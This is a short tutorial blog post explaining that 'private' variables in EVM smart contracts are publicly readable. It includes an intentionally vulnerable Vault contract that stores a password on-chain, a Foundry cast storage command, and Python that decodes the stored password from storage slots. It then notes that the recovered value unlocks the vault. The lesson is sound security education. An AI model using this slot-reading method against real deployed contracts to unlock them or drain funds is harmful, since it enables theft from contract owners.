Private variables are not really private on EVM

Originally published at app.daily.dev · 2 min read

Private variables on EVM blockchains are not really private and hidden

  • Do you think storing important keys and data in private variables is safe on EVM chains? The definition says it all: the EVM is a transparent state machine, and every byte of contract storage is public
  • Attackers constantly look for the deployed addresses of contracts that are vulnerable and hold funds
  • Marking a variable as private only prevents other contracts from reading it through Solidity; it does not hide the value from the world outside the chain
  • State variables marked private, and even the local values and arguments a transaction passes around, are still visible to anyone who can query a node or read the chain

Simple contract scenario

  • The contract below stores a password on-chain in a state variable marked private

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Vault {
    bool public locked;
    bytes32 private password; // @> lives in storage slot 1 and is readable by anyone

    constructor(bytes32 _password) {
        locked = true;
        password = _password;
    }

    // Anyone who knows the stored value can unlock the vault
    function unlock(bytes32 _password) public {
        if (password == _password) {
            locked = false;
        }
    }
}

  • The contract above stores the password in a private variable on the assumption that this makes it safe and that no one can read it!!!

Simple way to access private and public data of deployed contracts

  • With the contract address and its storage layout, an attacker can read every value stored on-chain, whether it was declared private or public

1. Through cast commands:

  • Developers using Foundry can use cast to read the storage of any contract with the command below:
cast storage --rpc-url $SEPOLIA_RPC_URL --etherscan-api-key $ETHERSCAN_API_KEY CONTRACT_ADDRESS SLOT_NUMBER
  • Given a slot number, this returns the raw 32-byte value stored at that slot, regardless of the variable's visibility. Run without a slot (and with the Etherscan API key), it pulls the verified source and prints the full storage layout, so you know which slot holds which private variable

2. Through Etherscan:

  • Go to Etherscan and search for the contract address

  • Copy a transaction hash from the contract's transactions (including internal transactions) and open it

  • Switch to the State tab and look at the storage values the transaction wrote!!!
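As an added example that is not part of the original post, here is Python that does by hand what `cast storage` and the Etherscan State tab show: it assigns storage slots to the Vault contract's variables using Solidity's packing rules, builds the `eth_getStorageAt` JSON-RPC request a node would answer, and decodes the returned slot. The node reply is a constructed stand-in (the password `hunter2` and the contract address are assumptions) so it runs offline; the same decoder works on the hex value `cast storage` prints. It goes slightly beyond the Vault case by handling packed value types (bool, address, uint8) as well.

```python
"""Read "private" Solidity state variables from raw storage slots.

Solidity packs value-type state variables into 32-byte slots in declaration
order: a variable that does not fit in the remaining bytes of the current
slot starts a new one, and the first variable placed in a slot occupies the
lowest-order bytes. Given the layout, anyone can ask a node for the raw slot
with eth_getStorageAt and decode the value; `private` never enters into it.
"""
import json

SLOT_BYTES = 32

# Storage widths (in bytes) of the value types handled below.
TYPE_SIZES = {"bool": 1, "uint8": 1, "address": 20, "uint256": 32, "bytes32": 32}


def compute_layout(declarations):
    """Map (name, type) declarations in source order to slot/offset/size.

    Implements Solidity's packing rule for value types only: structs, arrays
    and mappings always start a fresh slot and are not handled here.
    """
    layout = {}
    slot, offset = 0, 0
    for name, typ in declarations:
        size = TYPE_SIZES[typ]
        if offset + size > SLOT_BYTES:      # does not fit: open a new slot
            slot, offset = slot + 1, 0
        layout[name] = {"slot": slot, "offset": offset, "size": size, "type": typ}
        offset += size
        if offset == SLOT_BYTES:            # slot full: next variable starts fresh
            slot, offset = slot + 1, 0
    return layout


def storage_request(contract, slot, block="latest", req_id=1):
    """Build the JSON-RPC body that `cast storage <addr> <slot>` sends to the node."""
    return json.dumps({
        "jsonrpc": "2.0",
        "method": "eth_getStorageAt",
        "params": [contract, hex(slot), block],
        "id": req_id,
    })


def decode_variable(raw_slot_hex, entry):
    """Extract one packed variable from a raw 32-byte slot value.

    Byte offset `o` counts from the low-order end, so the variable sits in
    bits [8*o, 8*(o+size)) of the slot read as a big-endian integer.
    """
    word = int(raw_slot_hex, 16)
    mask = (1 << (8 * entry["size"])) - 1
    value = (word >> (8 * entry["offset"])) & mask
    if entry["type"] == "bool":
        return value != 0
    if entry["type"] == "address":
        return "0x" + value.to_bytes(20, "big").hex()
    if entry["type"] == "bytes32":
        return "0x" + value.to_bytes(32, "big").hex()
    return value


# Vault from the post: `locked` lands in slot 0, `password` in slot 1.
VAULT_LAYOUT = compute_layout([("locked", "bool"), ("password", "bytes32")])

# Constructed stand-in for the node's eth_getStorageAt replies for a deployed
# Vault(bytes32("hunter2")): a bytes32 literal is left-aligned and zero-padded.
FAKE_NODE_STORAGE = {
    0: "0x" + "00" * 31 + "01",
    1: "0x" + b"hunter2".ljust(32, b"\x00").hex(),
}


def read_private_password(storage=FAKE_NODE_STORAGE, layout=VAULT_LAYOUT):
    """What an attacker does: look up the slot, fetch it, decode it."""
    entry = layout["password"]
    return decode_variable(storage[entry["slot"]], entry)


if __name__ == "__main__":
    assumed_contract = "0x" + "ab" * 20   # placeholder address, not a real deployment
    print(VAULT_LAYOUT)
    print(storage_request(assumed_contract, VAULT_LAYOUT["password"]["slot"]))
    print("password slot decodes to", read_private_password())
```

The recovered `bytes32` is exactly what `Vault.unlock(bytes32)` compares against, so passing it to `unlock` is the whole "exploit"; the slot lookup did all the work.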


Try this CTF to gain more understanding

Real-world case studies worth looking at

So be aware of what you store on-chain, and of how easily an attacker can explore your contract's storage and drain its funds
